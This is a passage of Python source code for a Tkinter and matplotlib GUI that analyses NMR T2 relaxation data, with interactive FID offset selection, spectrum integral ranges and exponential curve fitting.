        self.parent.plot_t2_ranges = Frame_plot_T2_ranges(self.parent, self.trace)
    def Interrupt(self, event=None):
        '''Stops the analysis loop'''
        #Destroy frame and plots
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
        #stop the analysis loop
        self.parent.temperatures.wait.set(False)
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #split in two half frames
        self.frame_left = tk.Frame(self)
        self.frame_right = tk.Frame(self)
        self.frame_left.pack(side='left', fill='y')
        self.frame_right.pack(side='left', fill='y')
        #add frames on left side
        self.frame_left1 = tk.Frame(self.frame_left, bd=5)
        self.frame_left2 = tk.Frame(self.frame_left, bd=5)
        self.frame_left3 = tk.Frame(self.frame_left, bd=5)
        self.frame_left1.pack(side='top')
        self.frame_left2.pack(side='top')
        self.frame_left3.pack(side='top', fill='x')
        #add frames on right side
        self.frame_right1 = tk.Frame(self.frame_right, bd=5)
        self.frame_right2 = tk.Frame(self.frame_right, bd=5)
        self.frame_right1.pack(side='top')
        self.frame_right2.pack(side='top')
        #add canvases and toolbars
        #plot 1 (temperature stability)
        self.fig_left1 = plt.figure(dpi=100, figsize=(7,3))
        self.fig_left1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
        self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
        self.canvas_left1._tkcanvas.pack()
        #plot 2 (T2 decay with draggable range marker)
        self.fig_left2 = plt.figure(dpi=100, figsize=(7,4))
        self.fig_left2.subplots_adjust(bottom=0.15, left= 0.12, right=0.96, top=0.9)
        self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
        self.canvas_left2._tkcanvas.pack()
        #interrupt button
        self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
        self.button_interrupt.pack(side='left', anchor='w')
        #label and edit of mean_range
        self.frame_left3_middle = tk.Frame(self.frame_left3)
        self.frame_left3_middle.pack(anchor='center')
        self.label_mean = tk.Label(self.frame_left3_middle, text='Selected range:')
        self.label_mean.pack(side='left')
        self.entry_mean_var = tk.StringVar(self, value=self.range)
        self.entry_mean = ttk.Entry(self.frame_left3_middle,
                                    textvariable=self.entry_mean_var, width=3)
        self.entry_mean.pack(side='left')
        #plot 3 (phase per file)
        self.fig_right1 = plt.figure(dpi=100, figsize=(7,3.5))
        self.fig_right1.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
        self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
        self.canvas_right1._tkcanvas.pack()
        #plot 4 (shift-left per file)
        self.fig_right2 = plt.figure(dpi=100, figsize=(7,3.5))
        self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
        self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
        self.canvas_right2._tkcanvas.pack()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_right, text='Confirm', command=self.Finish)
        self.button_confirm.pack(side='top', anchor='ne')
    def Fill_plots(self, temp_list, temp_list2, temp_set, tau_list, t2_list, phase_list, shl_list):
        '''Puts the contents into the plot fields.

        temp_list/temp_list2 -- two temperature sensor readings per file
        temp_set             -- temperature setpoint
        tau_list/t2_list     -- T2 decay delays and signals
        phase_list/shl_list  -- per-file phase and shift-left values
        (all come from trace.Quick_T2())
        '''
        #starting values: means over the first self.range points
        self.mean_t2 = np.mean(t2_list[:self.range])
        self.mean_phase = np.mean(np.unwrap(phase_list[:self.range]))
        self.mean_shl = np.round(np.mean(shl_list[:self.range]))
        #x axes
        n = len(tau_list)
        x_list = np.linspace(1,n,n)
        #plot 1, temperature stabillity
        #(a sensor is plotted only if its mean is within 2 K of setpoint)
        self.axes_left1 = self.fig_left1.add_subplot(111)
        if abs(np.mean(temp_list) - temp_set) < 2:
            self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
        if abs(np.mean(temp_list2) - temp_set) < 2:
            self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
        self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
        self.axes_left1.margins(0.02, 0.1)
        self.axes_left1.set_title('Temperature stabillity check')
        self.axes_left1.set_xlabel('File index')
        self.axes_left1.set_ylabel('Temperature (K)')
        self.axes_left1.legend(loc='upper right')
        self.axes_left1.grid()
        #plot 2
        self.axes_left2 = self.fig_left2.add_subplot(111)
        self.axes_left2.plot(tau_list, t2_list, 'bo', color=colors[1], label='Data')
        self.axes_left2_vline = self.axes_left2.axvline(x=tau_list[self.range],
                                                        color=colors[2], label='Select')
        self.axes_left2_hline = self.axes_left2.axhline(y=self.mean_t2, color=colors[0],
                                                        label='Plato')
        self.axes_left2.set_yscale('log')
        self.axes_left2.set_title('T2 quick check')
        self.axes_left2.set_xlabel(r'$\tau$ ($\mu$s)')
        self.axes_left2.set_ylabel('Signal')
        #legend = self.axes_left2.legend(loc='lower right')
        #legend.draggable()
        self.axes_left2.grid()
        #plot 3
        self.axes_right1 = self.fig_right1.add_subplot(111)
        self.axes_right1.plot(x_list, np.unwrap(np.array(phase_list))*180/np.pi, marker='.',
                              color=colors[1], label='Phase')
        self.axes_right1_hline = self.axes_right1.axhline(self.mean_phase*180/np.pi, color=colors[0], label='Mean phase')
        self.axes_right1.margins(0.02, 0.1)
        self.axes_right1.set_title('Phase check')
        self.axes_right1.set_xlabel('File index')
        self.axes_right1.set_ylabel('Phase (Deg)')
        #self.axes_right1.legend(loc='lower right')
        self.axes_right1.grid()
        #plot 4
        self.axes_right2 = self.fig_right2.add_subplot(111)
        self.axes_right2.plot(x_list, shl_list, marker='.',
                              color=colors[1], label='SHL')
        self.axes_right2_hline = self.axes_right2.axhline(self.mean_shl,
                                                          color=colors[0], label='Mean SHL')
        self.axes_right2.margins(0.02, 0.1)
        self.axes_right2.set_title('SHL check')
        self.axes_right2.set_xlabel('File index')
        self.axes_right2.set_ylabel('Shift left')
        #self.axes_right2.legend(loc='lower right')
        self.axes_right2.grid()
        #redraw canvases
        self.fig_left1.canvas.draw()
        self.fig_left2.canvas.draw()
        self.fig_right1.canvas.draw()
        self.fig_right2.canvas.draw()
        #draggable vline event
        def Drag(event):
            '''Allows dragging of the marker in left2, recalculates mean of selected points'''
            #left mouse button drags the selection marker
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.range = np.searchsorted(tau_list, event.xdata, side='right')
                self.mean_t2 = np.mean(t2_list[:self.range])
                self.mean_phase = np.mean(np.unwrap(phase_list[:self.range]))
                self.mean_shl = np.round(np.mean(shl_list[:self.range]))
                self.entry_mean_var.set(self.range)
                #update plot
                self.axes_left2_vline.set_xdata(event.xdata)
                self.axes_left2_hline.set_ydata(self.mean_t2)
                self.axes_right1_hline.set_ydata(self.mean_phase*180/np.pi)
                self.axes_right2_hline.set_ydata(self.mean_shl)
                self.fig_left2.canvas.draw()
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
        self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_T2_ranges(tk.Frame):
    '''Interactive selection screen for a T2 trace.

    Left side: mean FID and all FIDs with a draggable marker for the FID
    offset.  Right side (after confirming the offset): mean spectrum and
    all spectra with draggable left/right integral-range markers.
    <Left>/<Right> arrow keys step back/forward through the workflow.
    '''
    def __init__(self, parent, trace):
        '''makes the subframe and fills it up'''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #start from the selections remembered from the previous trace
        self.offset_select = self.parent.temperatures.previous_t2['offset'][0]
        self.range_l_select = self.parent.temperatures.previous_t2['integral_range'][0]
        self.range_r_select = self.parent.temperatures.previous_t2['integral_range'][1]
        self.mirroring = self.parent.temperatures.previous_t2['mirroring']
        #load widgets
        self.Widgets()
        #load plots and read
        self.Choose_offset(trace)
        self.focus()
        #global key bindings
        root.bind('<Left>', self.Previous)
        root.bind('<Right>', self.Confirm_offset)
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        def Set_offset(event=None):
            '''Entry change of offset, replot and write value'''
            try:
                self.offset_select = int(self.entry_offset.get())
                #update plot
                self.axes_left1_vline.set_xdata(self.offset_select)
                self.axes_left2_vline.set_xdata(self.offset_select)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        def Set_range(event=None):
            '''Entry change of ranges, replot and save value'''
            try:
                self.range_l_select = int(self.entry_range_l_var.get())
                self.range_r_select = int(self.entry_range_r_var.get())
                #move all four markers (both spectrum plots) to the new indices
                self.axes_right1_vline_l.set_xdata(self.spc_fr[self.range_l_select])
                self.axes_right2_vline_l.set_xdata(self.spc_fr[self.range_l_select])
                self.axes_right1_vline_r.set_xdata(self.spc_fr[self.range_r_select])
                self.axes_right2_vline_r.set_xdata(self.spc_fr[self.range_r_select])
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
            except ValueError:
                tk.messagebox.showerror('Error', 'The inserted values must be integers!')
        #split in two half frames
        self.frame_left = tk.Frame(self)
        self.frame_right = tk.Frame(self)
        self.frame_left.pack(side='left', fill='y')
        self.frame_right.pack(side='left', fill='y')
        #add frames on left side
        self.frame_left1 = tk.Frame(self.frame_left, bd=5)
        self.frame_left2 = tk.Frame(self.frame_left, bd=5)
        self.frame_left3 = tk.Frame(self.frame_left, bd=5)
        self.frame_left1.pack(side='top')
        self.frame_left2.pack(side='top')
        self.frame_left3.pack(side='top', fill='x')
        #add frames on right side
        self.frame_right1 = tk.Frame(self.frame_right, bd=5)
        self.frame_right2 = tk.Frame(self.frame_right, bd=5)
        self.frame_right3 = tk.Frame(self.frame_right, bd=5)
        self.frame_right1.pack(side='top')
        self.frame_right2.pack(side='top')
        self.frame_right3.pack(side='top', fill='x')
        #add canvases and toolbars
        #plot 1: mean FID
        self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
        self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
        self.canvas_left1._tkcanvas.pack()
        #plot 2: all FIDs
        self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_left2.subplots_adjust(bottom=0.12, left= 0.08, right=0.96, top=0.93)
        self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
        self.canvas_left2._tkcanvas.pack()
        #buttons left
        self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
        self.button_previous.pack(side='left')
        self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm_offset)
        self.button_confirm.pack(side='right')
        #check button for mirroring fid
        self.check_mirroring_var = tk.BooleanVar(self, False)
        if self.mirroring:
            self.check_mirroring_var.set(True)
        self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
        self.check_mirroring.pack(side='right')
        self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
        self.label_mirroring.pack(side='right')
        #middle frame: offset entry + setter button
        self.frame_left3_middle = tk.Frame(self.frame_left3)
        self.frame_left3_middle.pack(anchor='center')
        self.label_offset = tk.Label(self.frame_left3_middle, text='Selected offset:')
        self.label_offset.pack(side='left')
        self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
        self.entry_offset = ttk.Entry(self.frame_left3_middle,
                                      textvariable=self.entry_offset_var, width=5)
        self.entry_offset.pack(side='left')
        self.entry_offset.bind('<Return>', Set_offset)
        self.button_set_offset = ttk.Button(self.frame_left3_middle,
                                            text='Set offset', command=Set_offset)
        self.button_set_offset.pack(side='left')
        #plot 3: mean spectrum
        self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_right1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
        self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
        self.canvas_right1._tkcanvas.pack()
        #plot 4: all spectra
        self.fig_right2 = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_right2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
        self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right2)
        #self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
        self.canvas_right2._tkcanvas.pack()
        #buttons right: integral-range entries + setter + confirm
        self.label_range = tk.Label(self.frame_right3, text='Selected ranges:')
        self.label_range.pack(side='left')
        self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
        self.entry_range_l = ttk.Entry(self.frame_right3,
                                       textvariable=self.entry_range_l_var, width=5)
        self.entry_range_l.pack(side='left')
        self.entry_range_l.bind('<Return>', Set_range)
        self.label_range_comma = tk.Label(self.frame_right3, text=' , ')
        self.label_range_comma.pack(side='left')
        self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
        self.entry_range_r = ttk.Entry(self.frame_right3,
                                       textvariable=self.entry_range_r_var, width=5)
        self.entry_range_r.pack(side='left')
        self.entry_range_r.bind('<Return>', Set_range)
        self.button_set_range = ttk.Button(self.frame_right3, text='Set range', command=Set_range)
        self.button_set_range.pack(side='left')
        #disabled until the offset is confirmed
        self.button_close = ttk.Button(self.frame_right3, text='Confirm',
                                       command=self.Close, state='disabled')
        self.button_close.pack(side='right')
    #button commands
    def Previous(self, event=None):
        '''Back to the previous step!'''
        #reload the quick-check frame
        self.parent.plot_t2_quick.pack(side='left', fill='both', expand=True)
        #destroy me
        self.pack_forget()
        self.destroy()
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
    def Confirm_offset(self, event=None):
        '''Saves current offset range and opens integral ranges select'''
        self.trace.offset_range = (self.offset_select, None)
        self.parent.temperatures.previous_t2['offset'] = (self.offset_select, None)
        #remember mirroring
        self.parent.temperatures.previous_t2['mirroring'] = self.check_mirroring_var.get()
        self.trace.mirroring = self.check_mirroring_var.get()
        self.Choose_ranges(self.trace)
        #swap which confirm button is active and move focus along
        self.button_confirm.config(state='disabled')
        self.button_close.config(state='enabled')
        self.button_close.focus_set()
        #change global keys
        root.bind('<Right>', self.Close)
    def Close(self, event=None):
        '''Confirm the selection in this screen'''
        #save the integral ranges
        self.trace.integral_range = (self.range_l_select, self.range_r_select)
        self.parent.temperatures.previous_t2['integral_range'] = (self.range_l_select,
                                                                  self.range_r_select)
        #finish the analysis
        self.trace.Run()
        #unpack and destroy
        self.trace.analysed = True
        self.parent.plot_t2_quick.destroy()
        self.pack_forget()
        self.destroy()
        plt.close('all')
        #unbind global keys
        root.unbind('<Right>')
        root.unbind('<Left>')
        #load the overview frame
        self.parent.plot_t2_view = Frame_plot_T2_view(self.parent, self.trace)
    def Choose_offset(self, trace):
        '''Operations and plotting for choosing the FID offsets'''
        fids = list()
        for file in trace.file_list:
            fid = FID(file, trace.file_dir)
            fids.append(fid.x)
        #average only the files inside the trusted mean_range
        x_mean = np.mean(fids[slice(*trace.mean_range)], axis=0)
        #plot 1: mean FID with shl reference and draggable offset marker
        self.axes_left1 = self.fig_left1.add_subplot(111)
        self.axes_left1.plot(np.real(x_mean), color=colors[1], label='Re')
        self.axes_left1.plot(np.imag(x_mean), color=colors[2], label='Im')
        self.axes_left1.plot(np.abs(x_mean), color=colors[0], label='Abs')
        self.axes_left1.axvline(x=trace.mean_shl, color=colors[-1])
        self.axes_left1_vline = self.axes_left1.axvline(x=self.offset_select, color=colors[4])
        self.axes_left1.margins(0.02, 0.1)
        self.axes_left1.set_title('Mean FID')
        self.axes_left1.set_xlabel('Time (index)')
        self.axes_left1.set_ylabel('Signal (A.U.)')
        #self.axes_left1.legend(loc='upper right')
        self.axes_left1.grid()
        #plot 2: all FIDs stacked with a vertical offset for readability
        self.axes_left2 = self.fig_left2.add_subplot(111, sharex=self.axes_left1)
        for i, fid in enumerate(fids):
            self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(x_mean))*0.5*i,
                                 color=colors[i%9], label=str(i))
        self.axes_left2.axvline(x=trace.mean_shl, color=colors[-1], label='shl')
        self.axes_left2_vline = self.axes_left2.axvline(x=self.offset_select,
                                                        color=colors[4], label='Select')
        self.axes_left2.margins(0.02, 0.02)
        self.axes_left2.set_title('All FIDs')
        self.axes_left2.set_xlabel('Time (index)')
        self.axes_left2.set_ylabel('Absolute signal (A.U.)')
        self.axes_left2.grid()
        #draggable vline event
        def Drag(event):
            '''Allows dragging of the offset marker with the left mouse button'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.offset_select = int(event.xdata)
                self.entry_offset_var.set(self.offset_select)
                #update plot
                self.axes_left1_vline.set_xdata(event.xdata)
                self.axes_left2_vline.set_xdata(event.xdata)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
        self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
        self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
    def Choose_ranges(self, trace):
        '''Operations and plotting for choosing spectrum integral ranges'''
        spcs = list()
        for file in trace.file_list:
            fid = FID(file, trace.file_dir)
            fid.Offset(trace.offset_range)
            fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
            fid.Fourier()
            fid.Phase_rotate(trace.mean_phase)
            spcs.append(fid.spc)
            spc_fr = fid.spc_fr
        #frequency axis (same for all files); kept for Set_range/Drag
        self.spc_fr = spc_fr
        spc_mean = np.mean(spcs[slice(*trace.mean_range)], axis=0)
        #plot 3: mean spectrum with draggable range markers
        self.axes_right1 = self.fig_right1.add_subplot(111)
        self.axes_right1.plot(spc_fr, np.real(spc_mean), color=colors[1], label='Re')
        self.axes_right1.plot(spc_fr, np.imag(spc_mean), color=colors[2], label='Im')
        self.axes_right1.axvline(x=trace.fr, color=colors[-1])
        self.axes_right1_vline_l = self.axes_right1.axvline(x=spc_fr[self.range_l_select],
                                                            color=colors[4])
        self.axes_right1_vline_r = self.axes_right1.axvline(x=spc_fr[self.range_r_select],
                                                            color=colors[4])
        self.axes_right1.set_xlim((trace.fr - 0.5, trace.fr + 0.5))
        self.axes_right1.set_title('Mean spectrum (Drag with left and right mouse button)')
        self.axes_right1.set_xlabel('Frequency (MHz)')
        self.axes_right1.set_ylabel('Signal (A.U.)')
        self.axes_right1.legend(loc='upper left')
        self.axes_right1.grid()
        #plot 4: all spectra stacked with a vertical offset
        self.axes_right2 = self.fig_right2.add_subplot(111)
        for i, spc in enumerate(spcs):
            self.axes_right2.plot(spc_fr, np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
                                  color=colors[i%9], label=str(i))
        #reference frequency line (fixed: was mistakenly drawn on axes_right1 again)
        self.axes_right2.axvline(x=trace.fr, color=colors[-1])
        self.axes_right2_vline_l = self.axes_right2.axvline(x=spc_fr[self.range_l_select],
                                                            color=colors[4])
        self.axes_right2_vline_r = self.axes_right2.axvline(x=spc_fr[self.range_r_select],
                                                            color=colors[4])
        self.axes_right2.set_xlim((trace.fr - 0.5, trace.fr + 0.5))
        self.axes_right2.margins(0.02, 0.02)
        self.axes_right2.set_title('All FIDs')
        self.axes_right2.set_xlabel('Frequency (MHz)')
        self.axes_right2.set_ylabel('Real part of signal (A.U.)')
        self.axes_right2.grid()
        #draggable vline event
        def Drag(event):
            '''Left mouse drags the left range marker, right mouse the right one'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.range_l_select = np.searchsorted(spc_fr, event.xdata, side='left')
                self.entry_range_l_var.set(self.range_l_select)
                #update plot
                self.axes_right1_vline_l.set_xdata(event.xdata)
                self.axes_right2_vline_l.set_xdata(event.xdata)
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
            if event.button == 3 and event.inaxes != None:
                #find the index of selected points
                self.range_r_select = np.searchsorted(spc_fr, event.xdata, side='right')
                self.entry_range_r_var.set(self.range_r_select)
                #update plot
                self.axes_right1_vline_r.set_xdata(event.xdata)
                self.axes_right2_vline_r.set_xdata(event.xdata)
                self.fig_right1.canvas.draw()
                self.fig_right2.canvas.draw()
        self.axes_right1_vline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag)
        self.axes_right2_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
        self.fig_right1.canvas.draw()
        self.fig_right2.canvas.draw()
class Frame_plot_T2_view(tk.Frame):
    '''Review screen for one analysed T2 trace.

    Shows the parameter table (left), the T2 decay plot (middle) and the
    fit panel (right): model selection, start values, fitted values.  The
    user can refit, disable the point, repeat the analysis, export the raw
    data to CSV, or confirm and move on.
    '''
    def __init__(self, parent, trace):
        '''makes the subframe and fills it up'''
        tk.Frame.__init__(self, parent)
        self.pack(side='left', anchor='n')
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #load widgets
        self.Widgets()
        #global key bind
        root.bind('<Right>', self.Confirm)
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #button commands
        def Disable(event=None):
            '''Disables and red-flags the point to avoid plotting'''
            self.trace.disabled = not self.trace.disabled
            self.Refresh_parameters()
        def Repeat(event=None):
            '''Clears the T2 trace and starts the analysis from scratch'''
            self.trace.Reinit()
            self.Confirm()
            self.trace.analysed = False
        #bottom button row
        self.frame_bottom = tk.Frame(self)
        self.frame_bottom.pack(side='bottom', fill='x')
        #split in columns
        self.frame_parameters = tk.Frame(self, bd=5)
        self.frame_parameters.pack(side='left', anchor='n')
        self.frame_plot = tk.Frame(self, bd=5)
        self.frame_plot.pack(side='left', anchor='n')
        #parameters table
        self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
        self.label_parameters.pack(side='top')
        self.tree_columns = ('Name','Value')
        self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
                                            show='headings', selectmode='none', height=25)
        self.tree_parameters.pack(side='top',fill='y', expand=True)
        #define column widths
        self.tree_parameters.column('Name', width=80)
        self.tree_parameters.column('Value', width=120)
        #define column names
        for column in self.tree_columns:
            self.tree_parameters.heading(column, text=column)
        #display in degrees
        self.trace.mean_phase_deg = self.trace.mean_phase*180/np.pi
        #fill in params
        self.Refresh_parameters()
        #disable point button
        self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
                                         command=Disable, width=20)
        self.button_disable.pack(side='top')
        #redo analysis button
        self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
                                        command=Repeat, width=20)
        self.button_repeat.pack(side='top')
        #T2 plot
        self.fig_t2 = plt.figure(dpi=100, figsize=(8,6))
        self.fig_t2.subplots_adjust(bottom=0.1, left= 0.10, right=0.96, top=0.94)
        self.fig_t2.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
        self.fig_t2.text(0.82, 0.97, r'$y_0 \exp(-(\frac{x}{T_2})^r)$',
                         horizontalalignment='center', verticalalignment='center')
        self.canvas_t2 = FigureCanvasTkAgg(self.fig_t2, self.frame_plot)
        self.canvas_t2._tkcanvas.pack()
        self.Fill_plot()
        self.Fitting_frame()
    def Fitting_frame(self, event=None):
        '''Initializes/repacks the fitting frame, depending on the selected fitting function'''
        #repack: drop the previous fit panel if one exists (first call has none)
        try:
            self.frame_fit.destroy()
        except AttributeError:
            pass
        #fit frame
        self.frame_fit = tk.Frame(self, bd=5)
        self.frame_fit.pack(side='left', anchor='n', fill='y')
        #fit functions; r is the stretch exponent, kept in every signature so
        #the enable/disable-r mechanics below work for all models
        def Fit_exponential(x, T2=0.001, y0=1000, r=1):
            '''T2 (stretched) exponential fit model'''
            return y0*np.exp(-(x/T2)**r)
        def Fit_2exponential(x, T21=0.001, T22=0.01, y01=100, y02=100, r=1):
            '''T2 double exponential decay model'''
            #fixed: original line ended in a stray "\" which glued this return
            #to the next def and broke the module at parse time
            return y01*np.exp(-x/T21) + y02*np.exp(-x/T22)
        def Fit_exp_gauss(x, T21=0.001, T22=0.01, y01=100, y02=100, r=1):
            '''T2 exponential plus gaussian model'''
            return y01*np.exp(-x/T21) + y02*np.exp(-(x/T22)**2)
        def Fit_exp_gauss_2(x, T21=0.001, T22=0.01, y0=100, r=1):
            '''T2 exponential and gaussian model'''
            return y0*np.exp(-x/T21 -(x/(2*T22))**2)
        #fit start point estimates: line through data points 0 and 5 gives a
        #rough slope kk and intercept nn; -nn/kk estimates the decay time
        yy1=self.trace.area_list[0]
        yy2=self.trace.area_list[5]
        xx1=self.trace.tau_list[0]
        xx2=self.trace.tau_list[5]
        kk=(yy2-yy1)/(xx2-xx1)
        nn=yy1-kk*xx1
        #reference to functions
        # {label: [function, fit_params, start guess, display label]}
        self.fit_names = {'Single Exp':[Fit_exponential, ['T2', 'y0', 'r'], [-nn/kk, nn, 1],
                                        'y0*exp(-(x/T2)^r)'],
                          'Double Exp':[Fit_2exponential, ['T21','T22', 'y01', 'y02', 'r'],
                                        [-nn/kk, -nn/kk*10, nn/2, nn/2, 1],
                                        'y01*exp(-x/T21)+y02*exp(-x/T22)'],
                          'Gauss Exp':[Fit_exp_gauss, ['T21','T22', 'y01', 'y02', 'r'],
                                       [-nn/kk, -nn/kk, nn/2, nn/2, 1],
                                       'y01*exp(-x/T21)+y02*exp((-x/T22)**2)'],
                          'Gauss Exp 2':[Fit_exp_gauss_2, ['T21','T22', 'y0', 'r'],
                                         [-nn/kk, -nn/kk, nn/2, 1],
                                         'y0*exp(-x/T21 -(x/(2*T22))**2 )']
                          }
        def Fit():
            '''Executes the fit with given parameters and plots it'''
            Fit_function = self.fit_names[self.combo_fit_var.get()][0]
            #read start values from entry boxes
            start_params = dict()
            for entry,param in zip(self.entry_params_start, param_list):
                start_params[param]=float(entry.get())
            #data points: the echo decays over 2*tau
            x = np.array(self.trace.tau_list)*2
            y = self.trace.area_list
            y_start = [Fit_function(xx, **start_params) for xx in x]
            #check if last parameter (the stretch r) is enabled or not
            p_start = [start_params[key] for key in param_list]
            if not self.check_params_start_var.get():
                #r is fixed: take it out of the fitted parameters, show 1
                r_tmp = p_start.pop(-1)
                self.entry_params_fit[-1].config(state='normal')
                self.entry_params_fit[-1].delete(0, 'end')
                self.entry_params_fit[-1].insert('end', 1)
                self.entry_params_fit[-1].config(state='readonly')
            #run fit, p_optimal, p_covariance matrix
            if not self.check_params_start_var.get():
                popt,pcov = curve_fit(lambda x, *p: Fit_function(x, *p, r=r_tmp), x, y, p0=p_start)
            else:
                popt,pcov = curve_fit(Fit_function, x, y, p0=p_start)
            #readd last parameter so popt always matches param_list
            if not self.check_params_start_var.get():
                popt = np.append(popt, r_tmp)
            y_fit = [Fit_function(xx, *popt) for xx in x]
            #print values to entry boxes
            for i,p in enumerate(popt):
                self.entry_params_fit[i].config(state='normal')
                self.entry_params_fit[i].delete(0, 'end')
                self.entry_params_fit[i].insert('end','%.4g' %p)
                self.entry_params_fit[i].config(state='readonly')
            #update plots
            self.axes_start_plot.set_ydata(y_start)
            self.axes_fit_plot.set_ydata(y_fit)
            self.fig_t2.canvas.draw()
            #save parameters on the trace
            self.trace.fit_params = popt
            self.trace.fit_param_cov = pcov
            self.trace.fit_fun = self.combo_fit_var.get()
            self.trace.T2 = popt[0]
            self.trace.r = popt[-1]
            self.Refresh_parameters()
        def Change_fit(event=None):
            '''Changes the current fitting function'''
            #update memory in parent
            self.parent.temperatures.previous_t2['fit']=self.combo_fit_var.get()
            #rebuild the panel for the new parameter set
            self.Fitting_frame()
        #fit function selector, defaulting to the last used model
        self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
        self.label_fit.pack(side='top')
        self.combo_fit_var = tk.StringVar()
        try:
            self.combo_fit_var.set(self.parent.temperatures.previous_t2['fit'])
        except KeyError:
            self.combo_fit_var.set('Single Exp')
            self.parent.temperatures.previous_t2['fit']='Single Exp'
        self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
                                      textvar=self.combo_fit_var)
        self.combo_fit.pack(side='top')
        self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
        self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
        self.label_fit_fun.pack(side='top')
        self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
        self.label_starting_params.pack(side='top')
        param_list = self.fit_names[self.combo_fit_var.get()][1]
        #guesses for where params should start
        start_guess = self.fit_names[self.combo_fit_var.get()][2]
        #start parameters entry rows
        self.frame_params_start = list()
        self.label_params_start = list()
        self.entry_params_start = list()
        for i,param in enumerate(param_list):
            self.frame_params_start.append(tk.Frame(self.frame_fit))
            self.frame_params_start[i].pack(side='top', fill='y')
            self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
            self.label_params_start[i].pack(side='left', anchor='e')
            self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
                                                    width=10, justify='right'))
            self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
